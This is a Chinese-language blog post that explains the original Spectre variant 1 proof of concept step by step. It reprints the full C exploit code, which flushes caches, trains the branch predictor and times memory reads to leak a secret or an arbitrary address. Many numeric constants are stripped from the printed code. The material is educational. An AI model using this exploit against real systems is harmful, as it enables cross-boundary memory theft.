上面一篇介绍了spectre&meltdown基本原理和简单的demo方案,今天继续学习一下该漏洞发现团队原始的POC:https://spectreattack.com/spectre.pdf

  1、先展示一下运行结果,便于有个直观的认识:从打印的结果来看,成功猜测出了secret字符串的内容;

  

  2、下面详细解读代码

(1)整个漏洞利用核心的两个函数:rdtscp和clflush都在这两个头文件里申明了;

  1. #ifdef _MSC_VER
  2. #include <intrin.h> /* for rdtscp and clflush */
  3. #pragma optimize("gt", on)
  4. #else
  5. #include <x86intrin.h> /* for rdtscp and clflush */
  6. #endif

  (2)array1:attacker用来访问victim的数组。这里申明了160字节,但后续会用很大的数跨越数组定义时的边界限制,达到访问victim内存的目的

unuesed1和unused2:多核cpu,每个核都有各自的L1和L2缓存;缓存以line作为基本的单元,每个cache line有64字节;unuesed1和unuesed2刚好填满2个cache line,array1占用3个cache line;

这3个数组一共占用5个不同的cache line;

      array2:secret每个单位是1byte,大小不超过255,所以“横坐标”最大256;  每个cache line是64byte(最小缓存单元),也就是512bit,所以“纵坐标”是512;

  1. uint8_t unused1[];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
  2. uint8_t array1[] = { ,,,,,,,,,,,,,,, };//a shared memory space between the victim and the attacker
  3. uint8_t unused2[];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
  4. uint8_t array2[ * ];//(1)secret每个单位1字节,数字大小不超过255;(2)L1的单个cache line大小64K = 512bit,这里可存储256个不同的cache line (3)shared with the attacker and victim

                   

  (3)这个是victim的数据,也就是需要爆破的数据;

  1. char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover

  (4)通过array1申明的长度是160,但后面某些时候会传入远大于160的数,越界访问secret的内容后存入缓存。后面即使if条件不成立,cpu回退寄存器的状态,但是的缓存仍然还在

  1. uint8_t temp = ; /* ensure the compiler does not remove the victim_function() at compilation time*/
  2. // In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
  3. void victim_function(size_t x)
  4. {
  5.     if (x < array1_size)//array1_size不在缓存,需要从内存读,很耗时,cpu先行执行下面的语句
  6.     {
  7.         temp &= array2[array1[x] * ];//array1长度是160,但x可以远超160,比如main里面定义malicious_x,这样就进入secret的存储空间
  8.     }
  9. }

  (5)判断cache是否命中的阈值,这个值是多次实验得到的,不是理论推导出来的;

  1. #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold:80是多次实验测试得到的,不是某些理论推导出来的 */

  (6)保存缓存是否命中结果

  1. for (i = ; i < ; i++)
  2.         results[i] = ;

  (7)array2每个元素如果已经在cpu的缓存,全部清除,避免影响后续计时;

  1. for (i = ; i < ; i++)//每个元素的缓存都清零
  2.             _mm_clflush(&array2[i * ]); /* intrinsic for clflush instruction */

  (8)把array1_size从cpu缓存去除;紧接着的这个空转为了确保array1_size的从cpu缓存清除;

  1.  _mm_clflush(&array1_size);//array1_size从缓存去除
  2.  for (volatile int z = ; z < ; z++)//ensure the flush is done, and the processor does not re-order it;volatile强制cpu从内存读取Z的值,否则这个空转可能被编译器优化
  3.  {/* Delay (can also mfence),也可以用 mfence 替代*/
  4.  }

  (9)这里计算array1的偏移坐标,方法很复杂,单看代码很难理解为啥这么做,不妨先打印一些结果数据看看:

  1. x = ((j % ) - ) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
  2. x = (x | (x >> )); /* Set x=-1 if j%6=0, else x=0 */
  3. x = training_x ^ (x & (malicious_x ^ training_x));
  1.     构造的x如下:很有规律,每6次一个轮回;每个轮回前5次的x都是7,在arry1_size的范围内,if条件是成立的;最后一个远大于arry1_size,导致if条件失效;但CPU有分支预测功能,会根据该
    if分支附近或前面几个分支预测下一个if分支是否成立。前面5个分支都是成立的,会“诱导”cpu认为第6if也成立,进而提前执行temp &= array2[array1[x] * 512]的代码,把victim的内存读到cpu
    内部缓存; 然后就是执行victim_funtion();
  1. j=23 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
  2. j=22 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
  3. j=21 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
  4. j=20 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
  5. j=19 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
  6. j=18 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224
  7. j=17 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
  8. j=16 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
  9. j=15 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
  10. j=14 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
  11. j=13 tries=999 malicious_x=18446744073707453224 training_x=7 x=7
  12. j=12 tries=999 malicious_x=18446744073707453224 training_x=7 x=18446744073707453224

  (10)victim_function执行完后,重新从array2读数据,并计时;耗时最短的说明在victim中存的就是这个;

  1. /* Time reads. Order is lightly mixed up to prevent stride prediction */
  2.         for (i = ; i < ; i++)
  3.         {
  4.             mix_i = ((i * ) + ) & ;//1、打乱读取byte的顺序,避免cpu猜测和优化byte的读取  2、&255=&FF,只保留低8bit,效果相当于%255(小于255)或%255-1(大于255)
  5.             addr = &array2[mix_i * ];
  6.             time1 = __rdtscp(&junk); /* READ TIMER */
  7.             junk = *addr; /* MEMORY ACCESS TO TIME */
  8.             time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
  9.             if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
  10.                 results[mix_i]++; /* cache hit - add +1 to score for this value */
  11.         }

  (11)接下来就是排序,找出耗时最短的2个数字;

  1. /* Locate highest & second-highest results results tallies in j/k */
  2.         j = k = -;
  3.         for (i = ; i < ; i++)
  4.         {
  5.             if (j <  || results[i] >= results[j])
  6.             {
  7.                 k = j;
  8.                 j = i;
  9.             }
  10.             else if (k <  || results[i] >= results[k])
  11.             {
  12.                 k = i;
  13.             }
  14.         }
  15.         if (results[j] >= ( * results[k] + ) || (results[j] ==  && results[k] == ))
  16.             break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
  17.     }
  18.     results[] ^= junk; /* use junk so code above won't get optimized out*/
  19.     value[] = (uint8_t)j;
  20.     score[] = results[j];
  21.     value[] = (uint8_t)k;
  22.     score[] = results[k];

  (12)继续看main:这个就是从arry1到目标内存的offset:

  1. size_t malicious_x = (size_t)(secret - (char*)array1);

       紧接着会传入readMemoryByte函数去探测读取内容:

  1. printf("Reading at malicious_x = %p... ", (void*)malicious_x);
  2.         readMemoryByte(malicious_x++, value, score);

  (13)和https://www.cnblogs.com/theseventhson/p/13282921.html 这个POC比,这个demo多了两个功能:

  •  训(诱)练(导)cpu的分支预测结果,让其认为下一个if条件是成立的,提前执行if分支
  • 不仅仅能探测secret内容,还能让用户指定需要探测的目标地址和探测的数据长度,如下:
  1.     if (argc == )//第一个参数是目标地址,第二个参数是读取的字节数;
  2.     {
  3.         sscanf_s(argv[], "%p", (void**)(&malicious_x));
  4.         malicious_x -= (size_t)array1; /* Convert input value into a pointer;*/
  5.         sscanf_s(argv[], "%d", &len);
  6.         printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
  7.     }

完整的代码如下(精华都在注释了):

  1. #include <stdio.h>
  2. #include <stdint.h>
  3. #include <string.h>
  4. #ifdef _MSC_VER
  5. #include <intrin.h> /* for rdtscp and clflush */
  6. #pragma optimize("gt", on)
  7. #else
  8. #include <x86intrin.h> /* for rdtscp and clflush */
  9. #endif
  10.  
  11. /* sscanf_s only works in MSVC. sscanf should work with other compilers */
  12. #ifndef _MSC_VER
  13. #define sscanf_s sscanf
  14. #endif
  15.  
  16. /********************************************************************
  17. Victim code.
  18. ********************************************************************/;
  19. unsigned int array1_size = ;
  20. uint8_t unused1[];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
  21. uint8_t array1[] = { ,,,,,,,,,,,,,,, };//a shared memory space between the victim and the attacker
  22. uint8_t unused2[];//useful to ensure we hit different cache lines,On many processors (e.g Intel i3, i5, i7, ARM Cortex A53, etc) the L1 cache has 64 bytes per line.
  23. uint8_t array2[ * ];//(1)secret每个单位1字节,数字大小不超过255;(2)L3的单个cache line大小64K = 512bit,这里可存储256个不同的cache line (3)shared with the attacker and victim
  24.  
  25. char* secret = "The Magic Words are Squeamish Ossifrage.";//known only to the victim, and it's what the attacker is trying to recover
  26.  
  27. uint8_t temp = ; /* ensure the compiler does not remove the victim_function() at compilation time*/
  28. // In reality, the victim and the attacker would share a memory space and the attacker would have the ability to call victim_function()
  29. void victim_function(size_t x)
  30. {
  31.     if (x < array1_size)//array1_size不在缓存,需要从内存读,很耗时,cpu先行执行下面的语句
  32.     {
  33.         temp &= array2[array1[x] * ];//array1长度是160,但x可以远超160,比如main里面定义malicious_x,这样就进入secret的存储空间
  34.     }
  35. }
  36.  
  37. /********************************************************************
  38. Analysis code
  39. ********************************************************************/
  40. #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold:80是多次实验测试得到的,不是某些理论推导出来的 */
  41.  
  42. /* Report best guess in value[0] and runner-up in value[1] */
  43. void readMemoryByte(size_t malicious_x, uint8_t value[], int score[])
  44. {
  45.     static int results[];//内存单元读取的时间
  46.     int tries, i, j, k, mix_i;
  47.     unsigned int junk = ;
  48.     size_t training_x, x;
  49.     register uint64_t time1, time2;
  50.     volatile uint8_t* addr;
  51.  
  52.     for (i = ; i < ; i++)
  53.         results[i] = ;
  54.     for (tries = ; tries > ; tries--)
  55.     {
  56.         /* Flush array2[256*(0..255)] from cache */
  57.         for (i = ; i < ; i++)//每个元素的缓存都清零
  58.             _mm_clflush(&array2[i * ]); /* intrinsic for clflush instruction */
  59.  
  60.         /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
  61.         training_x = tries % array1_size;//training_x = 0~15
  62.         for (j = ; j >= ; j--)
  63.         {
  64.             _mm_clflush(&array1_size);//array1_size从缓存去除
  65.             for (volatile int z = ; z < ; z++)//ensure the flush is done, and the processor does not re-order it;volatile强制cpu从内存读取Z的值,否则这个空转可能被编译器优化
  66.             {/* Delay (can also mfence),也可以用 mfence 替代*/
  67.             }
  68.             /*每循环6次,其中5次产生较小的x,让if条件成立;第6次产生超大、让if不成立的x,但由于前5次的x都成立,cpu还是会预先执行if分支。前面5次小x就是用来训练cpu分支预测的,以达到第6次“欺骗”的目的*/
  69.             /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
  70.             /* Avoid jumps in case those tip off the branch predictor */
  71.             x = ((j % ) - ) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
  72.             x = (x | (x >> )); /* Set x=-1 if j%6=0, else x=0 */
  73.             x = training_x ^ (x & (malicious_x ^ training_x));
  74.  
  75.             /* Call the victim! */
  76.             victim_function(x);//x是相对arry1的偏移,可以深入secret数组探查;
  77.         }
  78.  
  79.         /* Time reads. Order is lightly mixed up to prevent stride prediction */
  80.         for (i = ; i < ; i++)
  81.         {
  82.             mix_i = ((i * ) + ) & ;//1、打乱读取byte的顺序,避免cpu猜测和优化byte的读取  2、&255=&FF,只保留低8bit,效果相当于%255(小于255)或%255-1(大于255)
  83.             addr = &array2[mix_i * ];
  84.             time1 = __rdtscp(&junk); /* READ TIMER */
  85.             junk = *addr; /* MEMORY ACCESS TO TIME */
  86.             time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
  87.             if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
  88.                 results[mix_i]++; /* cache hit - add +1 to score for this value */
  89.         }
  90.  
  91.         /* Locate highest & second-highest results results tallies in j/k */
  92.         j = k = -;
  93.         for (i = ; i < ; i++)
  94.         {
  95.             if (j <  || results[i] >= results[j])
  96.             {
  97.                 k = j;
  98.                 j = i;
  99.             }
  100.             else if (k <  || results[i] >= results[k])
  101.             {
  102.                 k = i;
  103.             }
  104.         }
  105.         if (results[j] >= ( * results[k] + ) || (results[j] ==  && results[k] == ))
  106.             break; /* Clear success if best is > 2*runner-up + 5 or 2/0) */
  107.     }
  108.     results[] ^= junk; /* use junk so code above won't get optimized out*/
  109.     value[] = (uint8_t)j;
  110.     score[] = results[j];
  111.     value[] = (uint8_t)k;
  112.     score[] = results[k];
  113. }
  114.  
  115. int main(int argc, const char** argv)
  116. {
  117.     printf("Putting '%s' in memory, address %p\n", secret, (void*)(secret));
  118.     size_t malicious_x = (size_t)(secret - (char*)array1); /* default for malicious_x,array1到secret的距离,包括array2[256 * 512]、unused2[64]、array1[160] */
  119.     int score[], len = strlen(secret);
  120.     uint8_t value[];
  121.  
  122.     for (size_t i = ; i < sizeof(array2); i++)//array2[256 * 512]
  123.         array2[i] = ; /* write to array2 so in RAM not copy-on-write zero pages */
  124.     if (argc == )//第一个参数是目标地址,第二个参数是读取的字节数;
  125.     {
  126.         sscanf_s(argv[], "%p", (void**)(&malicious_x));
  127.         malicious_x -= (size_t)array1; /* Convert input value into a pointer;*/
  128.         sscanf_s(argv[], "%d", &len);
  129.         printf("Trying malicious_x = %p, len = %d\n", (void*)malicious_x, len);
  130.     }
  131.  
  132.     printf("Reading %d bytes:\n", len);
  133.     while (--len >= )
  134.     {
  135.         printf("Reading at malicious_x = %p... ", (void*)malicious_x);
  136.         readMemoryByte(malicious_x++, value, score);
  137.         printf("%s: ", (score[] >=  * score[] ? "Success" : "Unclear"));
  138.         printf("0x%02X='%c' score=%d ", value[],
  139.             (value[] >  && value[] <  ? value[] : '?'), score[]);
  140.         if (score[] > )
  141.             printf("(second best: 0x%02X='%c' score=%d)", value[],
  142.                 (value[] >  && value[] <  ? value[] : '?'),
  143.                 score[]);
  144.         printf("\n");
  145.     }
  146. #ifdef _MSC_VER
  147.     printf("Press ENTER to exit\n");
  148.     getchar();    /* Pause Windows console */
  149. #endif
  150.     return ();
  151. }

参考:https://www.fortinet.com/blog/threat-research/into-the-implementation-of-spectre 代码解读

https://bbs.pediy.com/thread-254288.htm     https://xz.aliyun.com/t/6332  跨进程泄露敏感信息

https://bbs.pediy.com/thread-256190.htm  Intel处理器L3 Cache侧信道分析研究

intel:spectre&Meltdown侧信道攻击(二)的更多相关文章

  1. intel:spectre&Meltdown侧信道攻击(一)

    只要平时对安全领域感兴趣的读者肯定都听过spectre&Meltdown侧信道攻击,今天简单介绍一下这种攻击的原理( https://www.bilibili.com/video/av1814 ...

  2. intel:spectre&Meltdown侧信道攻击(三)—— raw hammer

    今天介绍raw hammer攻击的原理:这次有点“标题党”了.事实上,raw hammer是基于DRAM内存的攻击:所以理论上,只要是用了DRAM内存的设备,不论是什么cpu(intel.amd,或则 ...

  3. intel:spectre&Meltdown侧信道攻击(四)—— cache mapping

    前面简单介绍了row hammer攻击的原理和方法,为了更好理解这种底层硬件类攻击,今天介绍一下cpu的cache mapping: 众所周知,cpu从内存读数据,最开始用的是虚拟地址,需要通过分页机 ...

  4. intel:spectre&Meltdown侧信道攻击(五)—— DRAM address mapping

    前面介绍了row hammer,理论上很完美,实际操作的时候会面临很尴尬的问题:内存存储数据最小的单位是cell(就是个电容,充电是1,放电是0),无数个横着的cell组成row,无数个竖着的cell ...

  5. 第四十三个知识点:为AES描述一些基础的(可能无效)的对抗侧信道攻击的防御

    第四十三个知识点:为AES描述一些基础的(可能无效)的对抗侧信道攻击的防御 原文地址:http://bristolcrypto.blogspot.com/2015/07/52-things-numbe ...

  6. 第四十五个知识点:描述一些对抗RSA侧信道攻击的基础防御方法

    第四十五个知识点:描述一些对抗RSA侧信道攻击的基础防御方法 原文地址:http://bristolcrypto.blogspot.com/2015/08/52-things-number-45-de ...

  7. 侧信道攻击,从喊666到入门之——Unicorn的环境构建

    作者:backahasten 发表于小米安全中心微信公众号 0x00 前言 Unicorn可以模拟多种指令集的代码,在很多安全研究领域有很强大的作用,但是由于需要从头自己布置栈空间,代码段等虚拟执行环 ...

  8. 嵌入式 -- WINKHUB 边信道攻击 (NAND Glitch)

    0x00 前言 随着物联网IOT的飞速发展,各类嵌入式设备, 路由器安全研究也越来越火. 但因为跟以往纯软件安全研究的要求不同, 这类研究往往需要结合相应的硬件知识. 很多朋友困惑如何开始, 甚至卡在 ...

  9. ORW-测信道攻击

    做SCTF时碰到一个没看过的题型,比赛结束之后才知道是orw的一个玩法,测信道攻击.主要特点就是只给使用open,read,但是不给write,即无法把flag输出到终端.这里可以通过把flag读到栈 ...

随机推荐

  1. 记录一下安装hexo的过程

    记录一下安装hexo的过程 首先你的电脑需要安装node.js和Git 安装好Git之后需要配置本机与Github之间的ssh方便更新同步博客到Github上,在一个地方新建一个文件夹作为我们博客的根 ...

  2. about 蛤蛤

    蛤蛤属于蛤蛤门(haha),蛤蛤纲(haha),蛤蛤亚纲(haha),蛤蛤目(haha),蛤蛤总科(haha),蛤蛤科(haha).

  3. 数据可视化之powerBI基础(十一)Power BI中的数据如何导出到Excel中?

    https://zhuanlan.zhihu.com/p/64415543 把Excel中数据加载到PowerBI中我们都已经熟悉了,但是怎么把在PowerBI中处理好的数据导出到Excel中呢?毕竟 ...

  4. Python面向对象04 /封装、多态、鸭子类型、类的约束、super

    Python面向对象04 /封装.多态.鸭子类型.类的约束.super 目录 Python面向对象04 /封装.多态.鸭子类型.类的约束.super 1. 封装 2. 多态 3. 鸭子类型 4. 类的 ...

  5. C# 字段初始值无法引用非静态字段、方法或属性( 类内部变量初始化)

    问题:字段初始值设定项无法引用非静态字段.方法或属性的问题 在类中  变量赋值其他变量报错? public class TestClass{  public TestClass()  {  }  pu ...

  6. CentOS7 源码编译安装Nginx

    源码编译安装nginx     1.下载nginx源码包(这里以nginx-1.18.0为例) wget http://nginx.org/download/nginx-1.18.0.tar.gz 2 ...

  7. Burp Suite Target Module - 目标模块

    模块目的之一:获取网站分析 1.从Proxy - HTTP history界面选中需要加入Target Scope的Host 地址,右击,选中Add to Scope. 2.打开Target - Sc ...

  8. Ethical Hacking - POST EXPLOITATION(2)

    MAINTAINING ACCESS - Methods 1. Using a veil-evasion Rev_http_service Rev_tcp_service Use it instead ...

  9. Harbor打怪升级

    目录 一.目标 二.V1.4升级至V1.6 三.V1.6升级至V1.9 四.V1.9升级至V2.0 五.写在最后 一.目标 Harbor V1.4版本升级至V2.0 注: Harbor升级需要注意的是 ...

  10. 在ShareX里添加流浪图床

    这里以咱流浪图床为例哈:-D 上传目标类型:图像.文件 请求方法:POST 请求URL:https://p.sda1.dev/api/v1/upload_external_noform URL参数:名 ...